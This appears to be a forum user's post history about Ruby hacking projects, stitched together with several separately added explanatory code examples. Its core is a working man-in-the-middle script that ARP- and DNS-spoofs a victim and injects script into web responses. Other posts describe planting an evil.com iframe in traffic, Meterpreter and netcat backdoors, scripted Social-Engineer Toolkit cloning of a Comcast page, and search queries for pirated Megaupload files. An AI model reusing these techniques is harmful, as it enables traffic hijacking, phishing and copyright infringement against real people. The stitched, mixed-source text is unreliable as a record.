i8igmac

Posts posted by i8igmac

  1. I have an organized list of movies; I have automated movie cover download, actor image download and a movie description document...

    I'm compiling this info into a website running on localhost. The most important feature is the trailer src, and I struggle to automate this download... OMDb provides a very nice trailer that I hope to download, OR just use the page/script source...

    I can engineer a proper GET request for a single download, but I notice the src location is not consistent...

    If someone can look at the page src of an IMDb trailer... I don't have the JavaScript skill to defeat the security they use to prevent this...

    I'm open to ideas; the iframe src could be the main page, but this is sloppy and I want to isolate the video only...

  2. Now this is just an example; I'm looking for help on building a list or a dictionary.

    I have built a few scanners and crawlers, and I have an idea... I'm sure it's already been done, but I like to do things my way...

    Let's say you use wget to crawl and download an entire site; now you have all the contents downloaded into a tmp directory, then use a Linux command like grep (just for example) to find a string...

    cat /tmp/site_crawl/* | grep exec
    echo exec(var)
    echo pcntl_exec(var)
    ...

    Example of a list I would like to build...

    passthru

    system

    exec

    pcntl_exec

    `` (backtick operator)

    I'm looking for a universal list for finding ALL possibilities, not just PHP... I guess the goal is to find a way to execute or write data on the server...

    Maybe there are vulnerabilities for CSS, Java, PHP etc... any string that may need further investigation...

    This is just an example; I'm sure you will never find any PHP exec etc. in plain text...
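    The grep-style audit the post describes, written out as an added Ruby example (not code from the original post). It walks a directory such as the wget crawl and reports command-execution sinks, including the backtick operator, which has no function name to grep for. The SINKS table is a starting point assembled here, not an exhaustive list, and it is meant for source you actually have (your own tree, a downloaded package), since a crawl only returns rendered output.

```ruby
# Added example, not from the original post: grep-style audit of a source
# tree for command-execution sinks. SINKS is a starting point assembled
# here, not an exhaustive catalogue.
SINKS = {
  "php"    => %w[passthru system exec shell_exec pcntl_exec popen proc_open eval],
  "python" => %w[subprocess.Popen subprocess.call subprocess.run],
  "java"   => %w[Runtime.getRuntime ProcessBuilder],
}
# PHP (and Perl/Ruby) backtick operator: `cmd` has no function name to match
BACKTICK = /`[^`\n]+`/

# Returns [[line_no, label, stripped_line], ...] for every hit in one source text.
def find_sinks(source)
  hits = []
  source.each_line.with_index(1) do |line, no|
    SINKS.each do |lang, names|
      names.each do |name|
        # word boundary plus "(" catches a call, not substrings like "executive"
        next unless line =~ /\b#{Regexp.escape(name)}\s*\(/
        hits << [no, "#{lang}:#{name}", line.strip]
      end
    end
    hits << [no, "backtick", line.strip] if line =~ BACKTICK
  end
  hits
end

# Walks a directory (e.g. the wget crawl in /tmp/site_crawl) and collects hits per file.
def scan_dir(dir)
  files = Dir.glob(File.join(dir, "**", "*")).select { |f| File.file?(f) }
  files.each_with_object({}) do |f, out|
    h = find_sinks(File.read(f, encoding: "BINARY"))
    out[f] = h unless h.empty?
  end
end

# Constructed sample: a vulnerable PHP page plus a line that must NOT match.
SAMPLE_PHP = <<~'PHP'
  <?php
  $out = system($_GET['cmd']);
  $listing = `ls -la /var/www`;
  echo 'executive summary';
PHP

if __FILE__ == $0
  find_sinks(SAMPLE_PHP).each { |no, label, text| puts "#{no}: #{label}  #{text}" }
end
```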

  3. I have made a tool that will mass download from Megaupload, a huge time saver. There are no captcha images (security image), so this makes my script simple...

    As a paid user my tool could download 200 files at a time, or as a free user 1 at a time with a 30 second wait time...

    Another feature is a Google crawl to find whatever file you're looking for and whether the links are still working...

    Here is a tip; it can be used with other file shares.

    Google search:

    Inurl:"forum" intext:"megaupload.com/?d=" intext:"movie-file-name-year-2012" blueray

  5. Hollywood sort of falsely advertises 'hacking'.

    This is a big reason why I spent endless hours learning.

    "What is a cookie virus?" From the 1995 movie Hackers: a cookie scrolls across the screen and supposedly eats up memory... A cookie is used when your web browser logs into a server; this cookie could be sniffed or stolen and give a hacker access to these websites.

    This was my first question ;p

  6. I have updated the above script: when the string "<head>" is found, the script inserts a small hello world script right after it and modifies the Content-Length of the current packet to make room for the extra data...

    All pages load properly and now I feel successful.

    HTTP/1.1 200 OK
    Content-Type: text/html; charset=UTF-8
    P3P: CP="Facebook 
    Set-Cookie: _e_0xIM_4=deleted
    X-Cnection: close
    Date: Fri, 13 Jan 2012 02:58:17 GMT
    Content-Length: 110
    
    <html><head><title></title></head><body><span id="fbEmuTrackingSuccess">Success</span></body></html>

    Only if the packet includes "Content-Length:" AND the desired string "<head>" will the exploit be inserted...

    I have tried searching for other strings like <script>, <head>, <body> etc... they all produce the same results.

    The problem is, what if none of these exist? Then no pages will be modified...

    What if there are several packets responding to one GET request that match my desired algorithm? Then there may be 10 exploits inserted on one page...

  7. For testing, set your browser's proxy settings to port 80... My goal is to have all pages modified and still load perfectly...

    My last test script:

    require 'eventmachine'
    
    attacker_ip = "192.168.1.136"
    victim      = "192.168.1.110"
    gateway     = "192.168.1.1"
    
    # dnsspoof hosts file: every name resolves to this machine
    dns = File.open("dns", "w+")
    dns.write("#{attacker_ip}        *.*") # this is your ip
    dns.close
    
    # set proxy settings in firefox to port 80
    # uncomment these lines when you want to use arpspoof/dnsspoof
    #`pkill spoof`
    #a = Thread.new { system "xterm -e 'arpspoof -i wlan0 -t #{victim} #{gateway}'" }
    #c = Thread.new { system "xterm -e 'arpspoof -i wlan0 -t #{gateway} #{victim}'" }
    #b = Thread.new { system "xterm -e 'dnsspoof -i wlan0 -f dns'" }
    
    # outbound side: one connection to the real web server per client request
    # (class definitions cannot live inside a Thread.start block, so they sit at top level)
    class Client < EM::Connection
      def initialize(other, finger, *args, &blk)
        @other, @finger = other, finger   # other = the browser's connection
        super(*args, &blk)
      end
    
      def post_init
        # mangle Accept-Encoding so the server answers uncompressed
        send_data @finger.sub("Accept-Encoding:", "Assept-Ensoding:")
      end
    
      def receive_data(response)
        # Array#to_s no longer joins its elements (ruby >= 1.9), so take the
        # capture group instead of response.scan(...).to_s
        clength = response[/Content-Length: (\d+)/, 1]
        if clength.nil? || !response.include?("<head>")
          @other.send_data response          # nothing to change, pass it through
        else
          exploit = "<script>alert('hello world')</script>"
          math    = exploit.length           # bytes added to the body
          puts response
          @other.send_data response.sub("<head>", "<head>#{exploit}")
                                   .sub("Content-Length: #{clength}", "Content-Length: #{clength.to_i + math}")
        end
      end
    end
    
    # inbound side: the browser talks to this on port 80
    module EchoServer
      def receive_data(finger) # finger is the request header received from the client; could log cookies or pages here
        host = finger[/^Host:\s*(\S+)/i, 1]
        # i dont know if this will prevent loading from cache
        data = finger.sub("If-None-Match:", "If-None-MutXX:").sub("If-Modified-Since:", "If-Modified-SXnce:")
        EventMachine::connect host, 80, Client, self, data # forward the request to the real host
      end
    end
    
    EventMachine::run {
      EventMachine::start_server attacker_ip, 80, EchoServer   # YOUR IP
    }

  8. Your Meterpreter payload, is it reverse TCP? If so, then you need to forward one more port to your BT5 machine; by default Meterpreter uses port 4444.

    I don't see why port forwarding is a bad idea.

    Here is a tip for monitoring connections; it works with Linux or Windows. On Windows you may need to run cmd as administrator.

    netstat -np

  9. I would like to share a script I put together about a year ago... it was a lot of fun building, and there are so many other directions I could go with this script...

    It's a little hard to explain, but here goes...

    First thing is starting up your arpspoof/dnsspoof and listening for traffic on port 80.

    (victim GET/facebook/with user123 cookies) ---> (evil-proxy GET /facebook/with user123 cookies) ---> (facebook.com) -->response(evil-proxy-MODIFY-DATA)--->response(victim)

    I'm working on a few problems right now: when you add bytes to the packet you have to change the frame length, or else the page will load in the victim's browser with incomplete code (the bottom half is missing).

    I think I just figured it out... Total length is 1500, or '05 dc'.

    0000 00 15 00 48 8f c5 00 1a 73 91 01 9c 08 00 45 00 ...H.... s.....E.
    0010 05 dc a4 d9 40 00 40 06 0b fc c0 a8 01 88 c0 a8 ....@.@. ........

    With some math I'll have to change this value.

    But here... give this a try...

    Install Ruby with EventMachine...

    Close any application that already has port 80 in use.
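    The length problem raised in this post and in the "Content-length" post above comes down to one invariant: the declared Content-Length must equal the body's size in bytes. Below is an added Ruby example (not code from the original posts) that audits a raw response for that invariant; the sample responses are constructed here, modelled on the Facebook response quoted in the thread.

```ruby
# Added example, not from the original posts: checks whether an HTTP response's
# Content-Length still agrees with its body, which is exactly what breaks when
# bytes are added in transit without fixing the header ("bottom half missing").
HEADER_END = /\r?\n\r?\n/

# Returns :ok, :mismatch or :no_length.
# The header name is matched case-insensitively (the thread itself writes both
# "Content-Length" and "Content-length"), and the body is measured in bytes,
# because Content-Length counts octets, not characters.
def check_content_length(raw)
  head, body = raw.split(HEADER_END, 2)
  return :no_length if body.nil?
  declared = head[/^Content-Length:\s*(\d+)\s*$/i, 1]
  return :no_length unless declared
  declared.to_i == body.bytesize ? :ok : :mismatch
end

# Builds a constructed response; `declared` defaults to the true byte length.
def build_response(body, declared = body.bytesize)
  "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=UTF-8\r\n" \
  "Content-length: #{declared}\r\n\r\n#{body}"
end

# Constructed samples modelled on the response quoted in the thread.
PAGE = '<html><head><title></title></head><body><span id="fbEmuTrackingSuccess">Success</span></body></html>'
INTACT = build_response(PAGE)
# body grew, header left untouched: the browser stops reading early
STALE  = build_response(PAGE + "<!-- extra bytes appended -->", PAGE.bytesize)
# String#length counts characters: "Succès" is 6 characters but 7 bytes, so a
# proxy that adjusts Content-Length with .length rather than .bytesize (as the
# posted script does) produces this mismatch on any non-ASCII content.
UTF8_OFF = build_response("Succès", "Succès".length)

if __FILE__ == $0
  { "intact" => INTACT, "stale" => STALE, "utf8" => UTF8_OFF }.each do |name, r|
    puts "#{name}: #{check_content_length(r)}"
  end
end
```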

  10. I have done a lot of testing with MITM attacks; I have tested all the tools mentioned in the video and many more...

    My goal was to insert malicious code into 100% of HTTP TCP protocol traffic; a good proof of concept or control point could be as simple as the use of an <iframe src="evil.com">.

    With all my testing, the most effective setup was DNS spoofing all the traffic to my own Ruby proxy running on port 66, which would modify the header fields, insert my evil code and send the packet to the client...

    I could never get 100% efficiency... but my lab setup was limited...

  11. Install irb on your Droid. It's just a quick scanner I use for discovering services on my network... when I need to find my FTP server or RDP... No need to root your device...

    Example: nmap -p 135,139,445,5900,8080,80,21,22 192.168.1.1-255

    require 'socket'
    
    # one thread per ip:port; the sleep keeps the thread count down on a phone
    Thread.start {
      for ip in 1..255
        for port in [135, 139, 445, 5900, 80, 8080, 21, 22]
          # pass ip/port in as block arguments: `for` does not create a new scope,
          # so a thread that only captured the variables would see later values
          Thread.start(ip, port) { |ip, port|
            begin
              t = TCPSocket.open("192.168.1.#{ip}", port)
            rescue
              print "e"          # connection refused / unreachable
            else
              t.close
              puts ""
              puts "#{ip}:#{port} open ports!!!"
            end
          }
          sleep 0.1
        end
      end
    }
    

    Note: if it crashes irb, set the sleep to 0.2 or higher. Your phone is limited on threads.

    The IP address must look like one of these:

    "192.169.1.#{ip.to_s}"
    "192.168.#{ip.to_s}.1"
    "xxx.#{ip.to_s}.x.x"
    "#{ip.to_s}.66.66.66"

    You can add more ports.

  12. I think my solid state hard drive crashed... so I just booted up from a live CD and tried to mount the hard drive, and got this error:

    Message from syslogd@mint at Oct 24 20:28:07 ...
     kernel:[  135.498149] Oops: 0000 [#1] SMP 
    
    Message from syslogd@mint at Oct 24 20:28:07 ...
     kernel:[  135.498151] last sysfs file: /sys/module/crc16/initstate
    
    Message from syslogd@mint at Oct 24 20:28:07 ...
     kernel:[  135.498194] Process mount (pid: 3176, ti=f3562000 task=f656a640 task.ti=f3562000)
    
    Message from syslogd@mint at Oct 24 20:28:07 ...
     kernel:[  135.498195] Stack:
    
    Message from syslogd@mint at Oct 24 20:28:07 ...
     kernel:[  135.498204] Call Trace:
    
    Message from syslogd@mint at Oct 24 20:28:07 ...
     kernel:[  135.498276] Code: 5b 5e 5f 5d c3 55 57 89 c7 56 53 e8 42 d6 12 00 8b 5f 04 83 c9 ff 8b 77 08 8b 2d b4 97 27 c1 eb 12 8b 14 8d f0 9c 3b c1 8b 47 14 <8b> 04 10 99 01 c3 11 d6 41 ba 20 00 00 00 89 e8 e8 aa 48 ff ff 
    
    Message from syslogd@mint at Oct 24 20:28:07 ...
     kernel:[  135.498290] EIP: [<c1140649>] __percpu_counter_sum+0x26/0x50 SS:ESP 0068:f3563d20
    
    Message from syslogd@mint at Oct 24 20:28:07 ...
     kernel:[  135.498292] CR2: 0000000001bee000

  13. I'm looking to start my own forum, and there are a few questions I have. I would like to start with a server from home, but I'm not sure how to get traffic... What services would you recommend? I have read a little bit on meta tags, but read that this is no promise to bring traffic, so maybe I could see some examples of how you have used meta tags to increase traffic on your site...

    I have my own tools I code with Ruby to perform small useful tasks for the site, so if I manage to get a forum up and fully functional I would then pay for a premium service, but are there any that include Ruby?

  14. I have built a lot of my own client tools with Ruby to perform small automated tasks, for example HTTP, FTP, SSH...

    I used to host public servers for games like Warcraft 3 and Counter-Strike... I would like to build a client to connect to one of my servers to say "hello world".

    require 'socket'
    # was: socket.open("192.168.1.109", "6113") -- needs TCPSocket and an integer port
    server = TCPSocket.open("192.168.1.109", 6113)
    server.puts("data.needed.to.establish.connection")
    server.recv(1024)   # recv needs a maximum length to read
    server.puts("data.needed.to.look.as.legit.client")
    server.recv(1024)
    server.puts("and more data")
    server.recv(1024)
    server.puts("hello to all people in the public server")
    server.recv(1024)
    server.close

    What I have done so far...

    I'll start up Wireshark to start a live capture, then with my game client I'll connect to the server... now I'm trying to duplicate in Ruby what I see in Wireshark...

    Is there an easy way to build a tool with this data I see in Wireshark??? Anyone have experience with this?

  15. A basic understanding of how server and client software work would, I think, be a good start... For example, install your first FTP server and properly configure your router, then have a friend from outside your home network download some files from your first FTP server...

    Google 'ftp server install tutorial'

    Google 'ftp server port forwarding'

    Google 'ftp client tutorial'

    Once you understand the difference between a client and a server, things will make sense later on... (as the expression goes, crawl before you walk)

    I would pick a scripting language like Perl/Python/Ruby... (RUBY!!!) I would go with Ruby; I have a lot of fun working with sockets. Learning how 2 computers communicate over the internet is very interesting and fun to learn... I could show you Ruby example code for trojan/malware/rootkit; always lots of fun coding these!

    Get yourself 2 computers at home and practice with netcat.exe (Google 'netcat backdoor tutorial'); you would have fun with this...

  16. I thought I would share a quick example. I'm not sure what it is you want... you could accomplish anything with other scripting (learn Ruby!!!).

    Save autoset.txt and execute this Ruby script as root; SET needs root privileges.

    ## autoset.txt
    2
    1
    2
    xfinity.comcast.net/constantguard/Alerts/
    2
    2
    666
    no
    777

    # sudo ruby script.rb
    # `date` output starts with the weekday name, capitalised ("Mon ...")
    if `date`[0..2] == "Mon"
      puts "lets do something"
      # was nested xterm -e 'xterm -e '...'' with broken quoting; one xterm is enough.
      # join so the script does not exit before the thread has started the command
      Thread.new { system("xterm -e './set-automate autoset.txt'") }.join
    else
      puts "today is not Monday!"
    end

  17. (inurl:"forum" intext:"Lincoln Lawyer" intext:"megaupload.com/?d")

    I'm looking for advice on improving this Google search.

    If you search Google with that query, you will find a working link a few pages into the results (enjoy ,-P).

    Google outputs something like this:

    The.Lincoln.Lawyer.DVDRip.XviD-TARGET
    ideees.xxx/forum/index.php?topic=376590.0 - Cached
    You +1'd this publicly. Undo
    Jul 1, 2011 – The Lincoln Lawyer (2011) Retail Date ..|.. 12-07-2011. Release Date ..|.. 28-06-2011. Source ..|. ... hxxp://xxx.megaupload.com/?d=1C02NXIN ...

    I'm looking for help on increasing the size of the response Google gives me, the 3 dots after the link! Maybe I can modify the search to give all links that include megaupload... Any tips that would give me better results, please share.

    The.Lincoln.Lawyer.DVDRip.XviD-TARGET
    ideees.xxx/forum/index.php?topic=376590.0 - Cached
    You +1'd this publicly. Undo
    Jul 1, 2011 – The Lincoln Lawyer (2011) Retail Date ..|
    hxxp://megaupload.com/?d123451
    hxxp://megaupload.com/?d123452
    hxxp://megaupload.com/?d123453
    hxxp://megaupload.com/?d123454
    hxxp://megaupload.com/?d123455
    hxxp://megaupload.com/?d123456
    hxxp://megaupload.com/?d123457

    I made a script that will process each link one at a time (as a free user) through Ruby sockets.

    The time it takes searching through that Google response manually is time consuming... a search function will complete my script 8-X
